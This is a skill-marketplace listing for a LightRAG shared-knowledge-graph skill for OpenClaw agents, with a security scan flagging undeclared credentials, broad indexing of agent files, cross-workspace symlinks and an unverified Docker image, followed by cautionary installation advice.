Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
LightRAG Knowledge Base
v1.0.0Deploy LightRAG as a shared knowledge graph for OpenClaw agents. Gives all your agents a common brain — query cross-agent knowledge, auto-index daily logs, a...
⭐ 0· 27·0 current·0 all-time
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
The manifest declares no required env vars or config paths, yet the SKILL.md instructs the operator to create a docker .env with OpenAI/embeddings API keys, LIGHTRAG_API_KEY, and JWT_SECRET, and to write/symlink scripts into multiple agent workspaces (~/.openclaw). This mismatch between declared requirements and actual runtime needs is incoherent and surprising.
Instruction Scope
Runtime instructions tell the agent/operator to read and bulk-index local files (e.g., ~/.openclaw/workspace/SOUL.md, USER.md, and memory/*.md), symlink scripts into many agent workspaces, and set up auto-indexing — actions that access a lot of sensitive agent-local data and grant persistent ability to read new logs. That scope is plausible for a cross-agent knowledge graph but also broad and privacy-sensitive; the skill gives broad discretion to collect/transmit agent data.
Install Mechanism
This is instruction-only (no install spec or code files), which minimizes direct repo-supplied code risk. However the instructions pull a Docker image 'lightrag/lightrag:latest' from Docker Hub — the image's provenance and contents are not documented here, so you must trust that image before running it on your systems.
Credentials
Although the registry metadata lists no required credentials, the SKILL.md requires LLM and embedding API keys (e.g., OpenAI-style sk- keys), plus LIGHTRAG_API_KEY and JWT_SECRET_KEY stored in the container .env. These are sensitive credentials and are required for the skill to function; the manifest should have declared them. Centralizing keys in the container increases blast radius if the container or host is compromised.
Persistence & Privilege
The deployment runs a persistent Docker container that will continuously serve and index data and the setup instructs adding scripts/symlinks to multiple agent workspaces, producing persistent presence across agents. The skill is not marked always:true, but its setup explicitly modifies other agent workspaces and creates a long-running service — an elevated persistence and access footprint that should be approved explicitly.
What to consider before installing
What to consider before installing:
- The SKILL.md requires OpenAI/embedding API keys, a LIGHTRAG_API_KEY, and a JWT secret but the registry entry declares none — expect to supply sensitive credentials. Use dedicated, low-privilege/budget-limited keys if possible.
- The setup will read and index files from ~/.openclaw (SOUL.md, USER.md, memory/*.md) and symlink scripts into multiple agent workspaces. That gives the service access to potentially sensitive agent profiles and logs; review which files will be indexed and explicitly exclude secrets before indexing.
- The Docker image 'lightrag/lightrag:latest' is pulled from Docker Hub; verify the image source (official repo, signed image, or build from audited source) before running in production.
- Run initially in an isolated environment (separate VM/container, limited network access) and test indexing behavior and exposed ports. Confirm the service binds to localhost and that no unintended port forwarding or proxying exposes it externally.
- Inspect the lightrag_insert/query scripts and any auto-index cron scripts referenced in the README to ensure they don't exfiltrate data or call unexpected endpoints. Search for any third-party endpoints or hardcoded remote hosts.
- If you want to proceed: restrict which files are indexed, use separate API keys with usage limits, rotate keys after testing, and consider enabling application-level access controls on the LightRAG instance.
- Ask the publisher for a canonical homepage/repo and signed release artifacts so you (or a security reviewer) can audit the Docker image and any code before trusting it.Like a lobster shell, security has layers — review code before you run it.
latestvk975f58npaddgchkz0an5hsx11846w5d
License
MIT-0
Free to use, modify, and redistribute. No attribution required.
